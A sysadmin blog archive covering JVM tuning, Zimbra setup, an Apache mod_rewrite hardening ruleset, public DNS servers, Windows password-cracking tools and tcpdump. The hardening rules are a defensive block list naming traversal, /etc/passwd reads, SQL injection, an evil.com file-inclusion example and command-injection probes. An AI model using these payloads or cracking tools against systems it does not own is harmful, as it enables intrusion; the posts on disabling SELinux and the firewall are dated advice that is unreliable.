October 2025
M T W T F S S
 12345
6789101112
13141516171819
20212223242526
2728293031  

Categories

October 2025
M T W T F S S
 12345
6789101112
13141516171819
20212223242526
2728293031  

Java tunning

The general tuning guidelines for java VM.
Here are some general tunning guideline to help you categorize the kinds of java tunning you will perform:
1. Be aware of ergonomics settings
The -server: server compiler
The -XX:+useParallelGC: parallel garbage collector
The -Xms: initial heap size is 1/64th of the machine’s physical memory
The -Xmx: maximum heap size is 1/4th of the machine’s physical memory ( up to 1 GB max)

2. Heap sizing
The mazimum heap size of a java application is limited by the factors:
The process daata model (32-bit or 64-bit) on the system.
The amount of physical memory available on the system.
The size of the java heap for a paricular application can never exceed or even reach the maximum
virtual address space of the process data model.

3. Garbage collector policy
The -XX:+UseParallelGC: parallel garbage collector
The -XX:+UseConcMarkSweepGC: concurrent garbage collector (CMS)
The -XX:+UseSerialGC: serial garbage collector ( for smaller applications and systems)

4. Other tunning parameters
The -XX:+UseLargePages: large memory pages.
The -XX:LargePageSizeInBytes:

Examples:
1. Tunning for throughput
Here is an example of specific command line tuning for a server application
running on system with 4 GB of memory and capable of running 32 threads simultaneously
(CPU’s and cores or contexts).
java -Xmx3800m -Xms3800m -Xmn2g -Xss128k -XX:+UseParallelGC -XX:ParallelGCThreads=20

2. Try the parallel old generation collector
Similar to example 1 we here want to test the impact of the parallel old generation collector.
java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -XX:+UseParallelGC -XX:ParallelGCThreads=20 -XX:+UseParallelOldGC

3. Try 256 MB pages
This tuning example is specific to those Solaris-based systems that would support the huge page size of 256 MB.
java -Xmx2506m -Xms2506m -Xmn1536m -Xss128k -XX:+UseParallelGC -XX:ParallelGCThreads=20
-XX:+UseParallelOldGC -XX:LargePageSizeInBytes=256m

4. Try -XX:+AggressiveOpts
This tuning example is similar to Example 2, but adds the AggressiveOpts option.
java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -XX:+UseParallelGC -XX:ParallelGCThreads=20
-XX:+UseParallelOldGC -XX:+AggressiveOpts

5. Try Biased Locking
This tuning example is builds on Example 4, and adds the Biased Locking option.
java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -XX:+UseParallelGC -XX:ParallelGCThreads=20
-XX:+UseParallelOldGC -XX:+AggressiveOpts -XX:+UseBiasedLocking

6.Tuning for low pause times and high throughput
This tuning example similar to Example 2, but uses the concurrent garbage collector
(instead of the parallel throughput collector).
java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -XX:ParallelGCThreads=20 -XX:+UseConcMarkSweepGC
-XX:+UseParNewGC -XX:SurvivorRatio=8 -XX:TargetSurvivorRatio=90 -XX:MaxTenuringThreshold=31

7. Try AggressiveOpts for low pause times and high
This tuning example is builds on Example 6, and adds the AggressiveOpts option.
java -Xmx3550m -Xms3550m -Xmn2g -Xss128k -XX:ParallelGCThreads=20 -XX:+UseConcMarkSweepGC
-XX:+UseParNewGC -XX:SurvivorRatio=8 -XX:TargetSurvivorRatio=90 -XX:MaxTenuringThreshold=31
-XX:+AggressiveOpts

 

 

A good start to understand JVM, Heap, Perm Gen and GC collector

JDK 6 Performance Features and Update
GC Collector:

Serial Collector (-XX:+UseSerialGC)
• Throughput Collectors
> Parallel Scavanging Collector for Young Gen
? -XX:+UseParallelGC
> Parallel Compacting Collector for Old Gen
? -XX:+UseParallelOldGC (on by default with ParallelGC in JDK 6)
• Concurrent Collector
> Concurrent Mark-Sweep (CMS) Collector
? -XX:+UseConcMarkSweepGC
> Concurrent (Old Gen) and Parallel (Young Gen) Collectors
? -XX:+UseConcMarkSweepGC -XX:+UseParNewGC
• The new G1 Collector as of Java SE 6 Update 14 (-XX:+UseG1GC)

Sample JVM Parameters:

Performance Goals and Exhibits
A) High Throughput (e.g. batch jobs, long transactions)
B) Low Pause and High Throughput (e.g. portal app)
• JDK 6
A) -server -Xms2048m -Xmx2048m -Xmn1024m -XX:+AggressiveOpts
-XX:+UseParallelGC -XX:ParallelGCThreads=16
B) -server -Xms2048m -Xmx2048m -Xmn1024m -XX:+AggressiveOpts
-XX:+UseConcMarkSweepGC -XX:+UseParNewGC -XX:ParallelGCThreads=16
• JDK 5
A) -server -Xms2048m -Xmx2048m -Xmn1024m -XX:+AggressiveOpts
-XX:+UseParallelGC -XX:ParallelGCThreads=16 -XX:+UseParallelOldGC
-XX:+UseBiasedLocking
B) -server -Xms2048m -Xmx2048m -Xmn1024m -XX:+AggressiveOpts
-XX:+UseConcMarkSweepGC -XX:+UseParNewGC -XX:ParallelGCThreads=16
-XX:+UseBiasedLocking
Rule of Thumb on Best selection of

> Garbage Collector (Make sure to override GCThreads)
> Heap Size (-Xms == 1/64 Max Memory or Max Heap and
-Xmx == ¼ Max Memory or Max Heap)
> Runtime Compiler (-server vs -client)
• Desired Goals (This is a hint, not a guarantee)
> Maximum Pause Time (-XX:MaxGCPauseMillis=)
> Application Throughput (-XX:GCTimeRatio= where
Application time = 1 / (1 + n))

Do check out 1.5 paper as it comes with sample parameters for high thoughput and low latency application
Java 1.5 Tuning White Paper
If you are using 1.6, check out the difference and improvement from 1.6 paper, take note that 1.5 parameters still apply to 1.6.

Java SE 6 Performance White Paper

A very practical and easy to understandable slide which walking you through the Sun HotSpot GC tuning tip and take-away parameters.

HotSpot JVM Tuning

Wondering whether java thread stack space (Xss) and perm gen (MaxPermSize) part of heap space. The answer is NO. That is why when u saw actually linux memory consumption is bigger than your “-Xmx” settings.
Using -Xss to adjust Java default thread stack size to save memory and prevent StackOverflowError

One working jvm parameters with JBoss server:

JAVA_OPTS=”-server -Xms3072m -Xmx3072m -Xmn2048m -XX:MaxPermSize=256m -Dorg.jboss.resolver.warning=true -Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000 -XX:ParallelGCThreads=8 -XX:+UseConcMarkSweepGC -XX:+UseParNewGC -XX:SurvivorRatio=8 -XX:TargetSurvivorRatio=90 -XX:MaxTenuringThreshold=31 -XX:+AggressiveOpts -XX:+PrintHeapAtGC -XX:+PrintGCTimeStamps -XX:+PrintGCDetails -XX:+PrintGCApplicationStoppedTime -Xloggc:/opt/jbos/server/default/log/jvmgc.log”

 

 

Advanced JVM Tuning for Low Pause
The standard Java Virtual Machine (JVM) is configured to optimize for throughput. But some systems are more interested in low pause/reduced latency and GC (garbage collection) might be one source of pausing.
(you can read an interesting article about what latency means to your business)

I have found a post on GigaSpaces forum providing some possible JVM configurations to optimize on latency:

-Xms2g -Xmx2g -Xmn150m
-XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode
-XX:+CMSIncrementalPacing -XX:CMSIncrementalDutyCycleMin=10
-XX:CMSIncrementalDutyCycle=50 -XX:ParallelGCThreads=8
-XX:+UseParNewGC -XX:MaxGCPauseMillis=2000
-XX:GCTimeRatio=10 -XX:+DisableExplicitGC
Please note that -XX:+UseConcMarkSweepGC has the heaviest impact on performance – decrease of 40%.

The following set of parameters shows 20% better performance than with -XX:+UseConcMarkSweepGC while the pause size still is below 100msec in embedded test with payload 10KB and 100 threads:

-Xms2g -Xmx2g -Xmn150m
-XX:GCTimeRatio=2 -XX:ParallelGCThreads=8
-XX:+UseParNewGC -XX:MaxGCPauseMillis=2000
-XX:+DisableExplicitGC
While I’m pretty sure that most of the applications do no need such an advanced VM configuration, it is interesting to see what strategies are employed when low latency is needed.

Option Details
-XX:+UseConcMarkSweepGC Sets the garbage collector policy to the concurrent (low pause time) garbage collector (also known as CMS)
-XX:+CMSIncrementalMode Enables the incremental mode. (works only with -XX:+UseConcMarkSweepGC)
-XX:+CMSIncrementalPacing Enables automatic adjustment of the incremental mode duty cycle based on statistics collected while the JVM is running
-XX:CMSIncrementalDutyCycleMin The percentage (0-100) which is the lower bound on the duty cycle when CMSIncrementalPacing is enabled
-XX:CMSIncrementalDutyCycle The percentage (0-100) of time between minor collections that the concurrent collector is allowed to run. If CMSIncrementalPacing is enabled, then this is just the initial value.
-XX:ParallelGCThreads Sets the number of garbage collector threads
-XX:+UseParNewGC Enables multi threaded young generation collection.
-XX:MaxGCPauseMillis A hint to the throughput collector that it’s desirable that the maximum pause time is lowed than the given value. (n.b. it looks like this value can also be used with the CMS garbage collector)
-XX:GCTimeRatio A hint to the virtual machine that it’s desirable that not more than 1 / (1 + GCTimeRation) of the application execution time be spent in the collector
-XX:+DisableExplicitGC Disables explicit garbage collection calls (System.gc())
There is no need to learn all these flags by heart as you can find them covered in various documents:

 

 

 

 

Custom settings was:

-Xms768m
-Xmx768m
-XX:NewSize=128m
-XX:MaxNewSize=128m
-XX:+UseParNewGC
-XX:ParallelGCThreads=8
-XX:MaxTenuringThreshold=1
-XX:SurvivorRatio=8
-XX:+UseConcMarkSweepGC
-XX:+CMSParallelRemarkEnabled
-XX:CMSInitiatingOccupancyFraction=65
-XX:+CMSScavengeBeforeRemark
-XX:+UseCMSInitiatingOccupancyOnly
-XX:MaxPermSize=250m
-XX:ReservedCodeCacheSize=64m

June 21st, 2013 | Category: JAVA | Leave a comment

Zimbra commands

How to find the host name 

host `hostname`

Domain level blocking of users

 

ZCS8:
zmlocalconfig -e postfix_smtpd_sender_restrictions=”hash:/opt/zimbra/postfix/conf/reject”

ZCS8:
Add hash:/opt/zimbra/postfix/conf/reject as the first line of /opt/zimbra/conf/zmconfigd/smtpd_sender_restrictions.cf

user@domain.com REJECT
domainX.com REJECT

Restart zimbra
postmap /opt/zimbra/postfix/conf/reject
zmmtactl stop && zmmtactl start

June 18th, 2013 | Category: ZIMBRA | Leave a comment

Enable PHP on Apache

After Yum install on php on centos or fedora

AddModule mod_php.c
LoadModule php_module         modules/mod_php.so
LoadModule php5_module        modules/libphp5.so
AddType application/x-httpd-php .php

And from PHP pages won’t load:

AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps
June 13th, 2013 | Category: Apache | Leave a comment

Apache mod_rewrite security rules for Web server harding

# Hardened Apache Mod_Rewrite Security Rule
# Ref: http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewritecond
# NC = ‘nocase|NC’ (no case-sensitive)
# OR = ‘ornext|OR’ (or next condition)
# L = last rule
RewriteEngine on

# Allow only GET and POST verbs
# ‘Coz most vul scanners use HEAD for hunting buggy files existence
RewriteCond %{REQUEST_METHOD} !^(GET|POST)$ [NC,OR]
# Ban Non-GUI Browsers
RewriteCond %{HTTP_USER_AGENT} ^.*(lynx|wget).* [NC,OR]

# Ban Typical Vulnerability Scanners and others

RewriteCond %{HTTP_USER_AGENT} ^()$ [NC,OR] # void of UserAgent

# Known Web vulnerabilty Scanners

RewriteCond %{HTTP_USER_AGENT} ^.*(syhunt|sqlmap|WhatWeb|Netsparker|w3af|Nstalker|acunetix|qualys|nikto|wikto|pikto|pykto).* [NC,OR]

# Random Underground Web Exploit Scanners

RewriteCond %{HTTP_USER_AGENT} ^.*(javascript\:alert|0d\s0a|ZeW|SlimBrowser|drone|DataCha|SBIder|Shelob|MobileRunner|Microsoft\sOffice|Plesk|Itah|Mosill|Internet\sExplorer\s4\.01|al_viewer|NetSeer|MSFrontPage|Yandex|webcollage|lwp\-trivial|Isidorus|core\-project|\<script\>|Toata\sdragostea\smea\spentru\sdiavola|StackRambler|Firebat|Y\!J\-SRD|ZmEu|libwww|perl|java|curl|ruby|python|scan|fuck|kiss|ass|Morfeus|0wn|hack|h4x|h4x0r).* [NC,OR]
# Denial-of-Service Tool
RewriteCond %{HTTP_USER_AGENT} ^.*(ApacheBench).* [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^.*(WWW\-Mechanize|revolt|Crawl|Mail\.Ru|Walker|sbide|findlinks|spide|Ace\sExplorer|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]

# Disable access to cgi-bins if not used
RewriteCond %{REQUEST_URI} ^/(cgi\.cgi|webcgi|cgi\-914|cgi\-915|bin|cgi|mpcgi|cgi\-bin|ows\-bin|cgi\-sys|cgi\-local|htbin|cgibin|cgis|scripts|cgi\-win|fcgi\-bin|cgi\-exe|cgi\-home|cgi\-perl|scgi\-bin)/ [NC,OR]
# Block out common attack strings
# Additional filtering can be put into
# HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE,HTTP_FORWARDED,HTTP_ACCEPT

# Directory Traversal, Null Byte Injection, HTTP Response Splitting
RewriteCond %{QUERY_STRING} ^.*(\.\.\/|\.\.%2f|\.\.%5C|\.\.%252F|\.\.%255C|\.\.%u2215|%u002e%u002e%u2215|%252e%252e%252f|%00|\\x00|\\u00|%5C00|%09|%0D%0A) [NC,OR]

# SQL Injection Probing
RewriteCond %{QUERY_STRING} ^.*(\@\@version|CHR\(|CHAR\(|UNION%20SELECT|/select/|/union/|/insert/|/update/|/delete/).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(or|and)%20([0-9]=[0-9]).* [NC,OR]
# Remote/Local File Inclusion
# RFI: yoursite.com/?pg=http://evil.com/shell.txt?
# LFI: yoursite.com/?pg=/logs/access_log?
RewriteCond %{QUERY_STRING} .*(=https|=http|=ftp)(://|%3a%2f%2f).*\?$ [NC,OR]
RewriteCond %{QUERY_STRING} (\/access_log|boot\.ini|\/etc\/passwd|%2Fetc%2Fpasswd|c:\\boot\.ini|c%3A\\boot\.ini|c:\/boot\.ini|c:%2Fboot\.ini|c%3A%2Fboot\.ini|c:boot\.ini|c%3Aboot\.ini).* [NC,OR]

# PHP Version Probing
RewriteCond %{QUERY_STRING} ^(=PHP).* [NC,OR]

# XSS Probing
RewriteCond %{QUERY_STRING} ^.*(\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(/XSS/).* [NC,OR]

# PHP GLOBALS Overriding
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

# PHP REQUEST variable Overriding
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

# PHP Command Injection Probing
# vuln.php?exec=uname -a;ls -al;whoami
RewriteCond %{QUERY_STRING} ^.*(=|;)(uname%20-|ls%20-|whoami).* [NC,OR]

# PHP CGI code execution

RewriteCond %{QUERY_STRING} ^[^=]*$ [OR]

RewriteCond %{QUERY_STRING} %2d|\-

# Deny access
RewriteRule ^(.*)$ /path/to/friendly_errror.php [F,L]

 

 

June 10th, 2013 | Category: Apache | Leave a comment

Public DNS to speed up your connection

Public DNS to speed up your connection

Google DNS

The Google DNS are very simple to memorize very stable:

8.8.8.8
8.8.4.4

Open DNS

They are very popular and the nature and philosophy of these DNS is that they are open and we can control:

208.67.222.222
208.67.220.220

OpenNIC

It is also a free alternative and promise to remove the navigation logs IP after 24 hours.

202.83.95.227
216.87.84.211
64.0.55.201
184.154.13.11

Level 3 Comunication

Response times are the best in the market:

4.2.2.1
4.2.2.2
4.2.2.3
4.2.2.4
4.2.2.5
4.2.2.6

Norton ConnectSafe

Security company Symantec has created a series of DNS security offer several options:

Extra security against malware and phishing attacks.

198.153.192.40
198.153.194.40

Apart from the above protection also filter content (adult, drugs, etc.)

198.153.192.50
198.153.194.50

If you want to add extreme protection filter content that is suitable for the whole family can use

198.153.192.60
198.153.194.60

Mnemonic So do you see that changing DNS security up in the last figure, the lowest 40 security and content filtering, 50 middle, 60 level computers perfect for children.
Dyn Internet Guide

These DNS promise good availability plus extra protection against dangerous sites verified as malicious content filtering.

216.146.35.35
216.146.36.36

May 21st, 2013 | Category: Uncategorized | Leave a comment

ZIMBRA INSTALLATION

Zimbra Collaboration Server 8 is amazing, it’s a fresh up take away from the rough hands of Microsoft Exchange. And most importantly, the opensource version has everything that I need. I’ve used it commercially and do recommend it to any clients as it’s just a great platform.

Installation of Zimbra is very easy. I’ve left the comments from my notes to make it easier to understand.
The installation is from a CentOS 6.3 minimal install after doing my routine secure, hardening and updates.

yum -y update

yum -y install wget setuptool system-config-network system-config-firewall ntsysv nscd perl nc sudo sysstat

yum install system-config-network-tui
yum install system-config-firewall-tui
yum install nc
yum install sudo
yum install mysql mysql-server mysql-devel
yum install sysstat
yum install wget
yum install bind bind-utils

 

setup # disable services iptables, sendmail
service iptables stop
service sendmail stop

chkconfig sendmail off
chkconfig netfs off
chkconfig rpcbind off
chkconfig rpcgssd off
chkconfig rpcidmapd off
chkconfig fcoe off
chkconfig iptables off
chkconfig ip6tables off
chkconfig iscsi off
chkconfig iscsid off

 

# Disable Startup Services
service postfix stop
chkconfig postfix off
service sendmail stop
chkconfig sendmail off
# Install nc package
yum -y install nc sysstat
# Disable Selinux (unfortunately, Zimbra does not yet fully support Selinux)
setenforce 0
nano /etc/selinux/config
# Modify
SELINUX=disabled
# Fix hosts file
nano /etc/hosts
# Append
ipaddress hostname.domain.com hostname

echo “0 4 * * * root ntpdate time.stdtime.gov.tw” >> /etc/crontab

 

# Installing Zimbra Opensource
wget http://files2.zimbra.com/downloads/8.0.2_GA/zcs-8.0.2_GA_5569.RHEL6_64.20121210115059.tgz
tar -zxvf zcs-8.0.2_GA_5569.RHEL6_64.20121210115059.tgz
cd zcs-8.0.2_GA_5569.RHEL6_64.20121210115059
# Centos isn’t officially supported but RHEL 6 is so we platform-override
# # THIS WILL TAKE A WHILE ##
# This is run in screen as it may take a while #
# depending on your machine, go grab a coffee #
# You can close the screen with ctrl+A+D and
# continue with your other operations #
# If you get disconnected or want to #
# return to the screen simply use $screen -R #
# Configuration steps following this are very self explanatory #
#
screen ./install.sh –platform-override

tep4. Install Zimbra 8
# cd zcs-8.0.0_GA_5434.RHEL6_64.20120907144639
# ./install.sh –platform-override
Q1. Do you agree with the terms of the software license agreement? [N] Y
Q2. Do you agree with the terms of the software license agreement? [N] Y
Q3. Install zimbra-ldap [Y] Enter
Q4. Install zimbra-logger [Y] Enter
Q5. Install zimbra-mta [Y] Enter
Q6. Install zimbra-snmp [Y] Enter
Q7. Install zimbra-store [Y] Enter
Q8. Install zimbra-apache [Y] Enter
Q9. Install zimbra-spell [Y] Enter
Q10. Install zimbra-memcached [N] Enter
Q11. Install zimbra-proxy [N] Enter
Q12. Install anyway? [N] Y
Q13.The system will be modified. Continue? [N] Y
Q14. Address unconfigured (**) items (? – help) 3
Q15. Select, or ‘r’ for previous menu [r] 4
Q16. Password for admin@zimbra.iwant-in.net (min 6 characters): [KFAYdeL6]
Q17. Select, or ‘r’ for previous menu [r] r
Q18. Select from menu, or press ‘a’ to apply config (? – help) a
Q19. Save configuration data to a file? [Yes] Enter
Q20. Save config in file: [/opt/zimbra/config.8480] Enter
Q21. The system will be modified – continue? [No] Yes
Q22. Notify Zimbra of your installation? [Yes] No
Q23. Configuration complete – press return to exit Enter

# Optimization on Lower Memory

su zimbra

zmcontrol status

su zimbra
zmlocalconfig -e tomcat_java_heap_memory_percent=40
zmlocalconfig -e mysql_memory_percent=10
zmlocalconfig -e mysql_table_cache=250
zmlocalconfig -e mailboxd_java_heap_memory_percent=10
zmlocalconfig -e zmmtaconfig_interval=7200
zmmtactl restart

# Using -l option connects to LDAP Server Instead, Fixes the issue with connecting through soap
# Disable Logger Service, Stats and SNMP
# THIS IS ONLY FOR MY LOW MEMORY SETUP. Not recommended for production use.

zmprov -l ms mail.domain.com -zimbraServiceEnabled snmp
zmprov -l ms mail.domain.com -zimbraServiceEnabled logger
zmprov -l ms mail.domain.com -zimbraServiceEnabled stats
zmcontrol stop
zmcontrol start
zmlocalconfig -e zmmtaconfig_interval=7200
zmprov -l mcf zimbraLogRawLifetime 7d
zmprov -l mcf zimbraLogSummaryLifetime 30d
zmmtactl restart

nano /opt/zimbra/conf/my.cnf in:
# Modify
# thread_cache_size = 110
# max_connections = 110

thread_cache_size = 20
max_connections = 20

nano /opt/zimbra/conf/amavisd.conf.in
# Modify
# $max_servers = 10;
$max_servers = 2;

# Configure Iptables Firewall
# enable zimbra ports
$iptables -A INPUT -m state –state NEW -m tcp -p tcp –dport 25 -j ACCEPT
$iptables -A INPUT -m state –state NEW -m tcp -p tcp –dport 80 -j ACCEPT
$iptables -A INPUT -m state –state NEW -m tcp -p tcp –dport 110 -j ACCEPT
$iptables -A INPUT -m state –state NEW -m tcp -p tcp –dport 143 -j ACCEPT
$iptables -A INPUT -m state –state NEW -m tcp -p tcp –dport 389 -j ACCEPT # -s 10.10.3.0/24
$iptables -A INPUT -m state –state NEW -m tcp -p tcp –dport 443 -j ACCEPT
$iptables -A INPUT -m state –state NEW -m tcp -p tcp –dport 465 -j ACCEPT
$iptables -A INPUT -m state –state NEW -m tcp -p tcp –dport 993 -j ACCEPT
$iptables -A INPUT -m state –state NEW -m tcp -p tcp –dport 995 -j ACCEPT
$iptables -A INPUT -m state –state NEW -m tcp -p tcp –dport 7071 -j ACCEPT # -s 10.10.3.0/24

And that’s it. Do check out the Zimbra website for a full list of features, unfortunately it is quite memory and cpu intensive and

it’s not comparable to the simple postfix squirelmail setups that some may be used to.

But the feature range is amazing and definitely worth a look into for those on the fence.

 

Adding my own WildCard SSL Certificate to Zimbra Collabration Server 8
Installation of Zimbra is a breeze, on my CentOS 6.3 Minimal install it took less than 5 minutes of interaction.

To get the SSL certificate installed took a little more tweaking then the install but after some trial and error the final list of commands were very short.

cp /opt/zimbra/ssl/zimbra/ca.pem /opt/zimbra/ssl/zimbra/ca.pem.bak
echo /dev/null > /opt/zimbra/ssl/zimbra/ca.pem
nano /opt/zimbra/ssl/zimbra/ca/ca.pem
# Insert our ca.pem here, only the certificate not the key
nano /opt/zimbra/ssl/zimbra/commercial/commercial.key
# Insert the .key file contents
nano /opt/zimbra/ssl/zimbra/commercial/commercial_ca.crt
# Insert the .crt file contents

# Now we’ll deploy our crt, telling Zimbra it’s a commercial cert (although it’s not)
/opt/zimbra/bin/zmcertmgr deploycrt comm /opt/zimbra/ssl/zimbra/ca/ca.pem

# Verify the installed cert
/opt/zimbra/bin/zmcertmgr viewdeployedcrt

# Force SSL with a redirect
zmtlsctl redirect

# Restart
zmcontrol stop
zmcontrol start

 

At command prompt type

su zimbra

zmcontrol status

To start the zimbra services type:
zmcontrol start

Open a browser and log in at http://mail.server.com

For admin panel type: http://mail.server.com:7071

 

Change Zimbra Web Client Logo and Title
Logo Path –> /opt/zimbra/jetty/webapps/zimbra/skins/_base/logos
Logo Files –> AppBanner.png
Title Defined Path –> /opt/zimbra/jetty/webapps/zimbra/WEB-INF/classes/messages/ZmMsg.properties
Title Desc –> zimbraTitle = IWANT-IN WebMail
zimbraLabel = IWANT-IN WebMail\uff1a

 

# su – zimbra

Depois, basta executar:

$ zmprov -l -v mcf zimbraXMPPEnabled TRUE
$ zmprov -v mc default zimbraFeatureIMEnabled TRUE
$ zmprov -v mc default zimbraFeatureInstantNotify TRUE
$ zmcontrol stop
$ zmcontrol start

 

May 15th, 2013 | Category: ZIMBRA | Leave a comment

free-windows-password-recovery-tools

Windows password recovery tools are used to recover, or reset lost user and administrator passwords used to log on to Windows operating systems.

Password recovery tools are often called “password cracker” tools because they are sometimes used to “crack” passwords by hackers. Legally cracking or unlocking your own Windows password is certainly a legitimate practice!

Note: Using a Windows password recovery program is just one of several ways to find a lost Windows password.

Important: Please read my Windows Password Recovery Programs FAQ for more information. I also have an easy-to-readcomparison of these programs too that might help.

Need to Crack a Different Kind of Password? See my list of free password crackers for free programs to crack PDF files, Word & Excel documents, RAR & ZIP archives, and more.
Here are the top 7 free Windows password recovery programs available. I also keep a list of premium Windows password recovery tools.

 

1. Ophcrack

Ophcrack Version 3.3.1 - LiveCD Version 2.3.1
The Ophcrack Windows password cracker is by far the best free Windows password recovery tool available. It’s fast and easy enough for a first time Windows password cracker with a basic knowledge of Windows.

With Ophcrack, you don’t need any access to Windows to be able to recover your lost passwords. Simply visit the site, download the free ISO image, burn it to a CD and boot from the CD. The Ophcrack program starts, locates the Windows user accounts, and proceeds to recover (crack) the passwords – all automatically.

In a test on a Windows 7 PC, Ophcrack recovered the 10-character password to my administrator account in 40 seconds. Ophcrack supports Windows 7, Windows Vista, and Windows XP.

 
 

2. Offline NT Password & Registry Editor

Download Offline NT Password & Registry Editor Password Recovery

Offline NT Password & Registry Editor works differently than most password recovery programs in that it erases yourWindows password instead of recovering it. You can think of it as more of a Windows password reset tool.

Like Ophcrack, you boot to a burned CD created with the Offline NT Password & Registry Editor ISO file. After running the program, you can log in to your Windows account without entering a password at all.

If you like this “password deleting” strategy then I highly recommend this program. Offline NT Password & Registry Editor works basically the same way as PC Login Now, listed below.
I tried Offline NT Password & Registry Editor on a Windows 7 PC and it reset the password immediately without problem. It should work equally well with Windows 7, Windows Vista, Windows 2000, and Windows NT. It should also work with 64-bit versions of these operating systems.

 

 
 

3. PC Login Now

 

PC Login Now Free Password Recovery Software
PC Login Now is one of the better free Windows password recovery programs I’ve tested… even though it doesn’t actuallyrecover passwords.

Instead of discovering and displaying your current Windows password, PC Login Now deletes it, allowing you to access Windows without a password, after which you can create a new one.

PC Login Now works just like the free and popular Offline NT Password & Registry Editor (listed above) only it’s much easier to use.

The trade-off with PC Login Now over Offline NT Password & Registry Editor is that PC Login Now causes Windows to detect a possible hard drive problem on the first reboot after deleting the password. I’ve never seen nor heard of a problem actually happening but it’s still a little bothersome.

In a test on a Windows 7 PC, PC Login Now deleted the 15-character password to my user account instantly. PC Login Now supports Windows 7, Windows Vista, and Windows XP.

 

 
 
 
 

4. Kon-Boot

Download Kon-Boot 1.0
Kon-Boot is yet another free password reset program, much like ONTP&RE and PC Login Now. Just burn the program to a disc, boot to it, and you’re off.

Kon-Boot works differently than the two password reset tools above, so if you have problems using them, give Kon-Boot a try. It’s very, very easy to use and probably the fastest password reset, and certainly password recovery, tool available.

Unfortunately, Kon-Boot 1.0 does not work with 64-bit versions of Windows.

I used Kon-Boot v1.0 to successfully delete the password on a Windows Vista PC and then also on a Windows XP PC. Kon-Boot is reported to also reset Windows 7 passwords but I was not able to make it work on two different Windows 7 PCs.

 

 

 

5. Cain & Abel

Cain & Abel Password Cracker
Cain & Abel is a free, fast and effective Windows password recovery tool.
Unlike Ophcrack and other popular Windows password hacking programs, Cain & Abel requires access to Windows under anadministrator account. Due to this fact, Cain & Abel is a valuable resource to recover passwords to accounts other than the one you’re using.

Add that to the fact that Cain & Abel is a bit more complicated to use than other password recovery apps and you have what is, in my book, a pretty advanced tool. Check it out if you think it might be useful to you.

Cain & Abel was able to recover the 10-character password to the Windows XP “Administrator” account in ten seconds. I couldn’t get it to work properly Windows Vista. One user said it works great with Windows 7.

 

 

6. LCP

LCP
LCP is yet another free password recovery software tool for Windows.

Like Cain & Abel, LCP is a standard Windows program you download from LCPSoft’s website and install inside of Windows, meaning you’ll need access to a user account on the computer.

LCP can be a little intimidating to those new to Windows password recovery tools so some prior knowledge is very helpful to avoid even bigger problems with your PC.

I haven’t been able to get LCP to work for me. If you’ve successfully used LCP and would like to share your experiences, pleaselet me know.

 

 
 

7. John The Ripper

John the Ripper is a very popular free password recovery tool that can be used to find Windows account passwords.

While the password recovery application itself is free, the wordlists used by John the Ripper to discover passwords do cost and are required for the software to work.

Note: I’m told there are free wordlist alternatives that work with John the Ripper which is why this Windows passwordrecovery tool is still listed as free. However, I have not tested any of them.

John the Ripper is operated at the command line making it a password cracking tool reserved for the very advanced user.

If you have experience with John the Ripper that you would like to share, please let me know.

 

 

Windows Password Recovery Tools Aren’t Necessary if You’re Proactive!

 

These Windows password recovery tools are great if you need them, but there’s a much easier way to access your account if you forget your password – a password reset disk!

How To Create a Password Reset Disk

A password reset disk is a special disk you can insert in your PC during the logon process that will allow you to change yourWindows password without knowing your current password. You will need to create this disk before you lose access to your account!

May 10th, 2013 | Category: Windows | Leave a comment

tcpdump

tcpdump
tcpdump -nn -ni eth0
tcpdump -i eth0
tcpdump -i eth0 -n

tcpdump -nn -ni eth0

tcpdump -nn -ni eth0 host 192.168.1.100

tcpdump -nn -ni eth0 src host 192.168.1.100

tcpdump -nn -ni eth0 dst host 192.168.1.100

tcpdump -nn -ni eth0 src host 192.168.1.100 and dst port 80

tcpdump -nn -ni eth0 host 192.168.1.100 or host 192.168.1.101

tcpdump -i eth0 dst host www.google.com

tcpdump -nn -ni eth0 not host 192.168.1.101

tcpdump -nn -ni eth0 not host 192.168.1.101 -w /tmp/test.pcap

tcpdump -r /tmp/test.pcap -XX

May 10th, 2013 | Category: Linux Commands | Leave a comment

Editor on Windows For more than 2 GB

Community wiki:

Suggestions are

  • gVim loads entire file into memory first.
  • SlickEdit
  • Emacs (has a low maximum buffer size limit if compiled in 32-bit mode).
  • Large Text File Viewer
  • PilotEdit (loads entire file into memory first).
  • HxD hex editor, but good for large files.

Text editors with 2GB limit: Notepad++JujueditTextPad

May 9th, 2013 | Category: Windows | Leave a comment

IREDMAIL replication server with 1 hour delay or what ever delay you want.

IREDMAIL replication server with 1 hour delay or what ever delay you want.

This is not a HA and it’s not using any ldap replication engine and mysql replication engine.

The methodology is just

backup –> transfer –> restore

The tools needed;

i. rsync

ii. NFS daemon

iii. mysqldump and restore (for mysql)

iv. slapcat (for ldap)

v. crond

Let’s start

ON THE MAIN SERVER

1. First of all sync the data in /var/vmail and /var/www to the backup server using rsync:

rsync -av –delete –stats –progress /var/vmail/ root@destination-host:/var/vmail/

beware of –delete option, this cmd will delete data that is in backup server and not in primary server.

2. Then sync the www folder

rsync -av –delete –stats –progress /var/www/ root@destinan-host:/var/www/

3. Backup the mysql – all database

mysqldump -u root -pPASSWD –all-databases > /mnt/ur-nfs-mount-folder/all-database.sql (Please read my previous article how to setup NFS)

4. Then run the backup script of LDAP provided by iredmail tools in /root/iRedmail/tools/ . Edit the files and change the path of destination backup to the /mnt/ur-nfs-mount-folder

5. Set all cmd to the crond, for example 1 hour

0 */1 * * * /root/rsync.sh

 

ON THE BACKUP SERVER

1. Run mysql restore

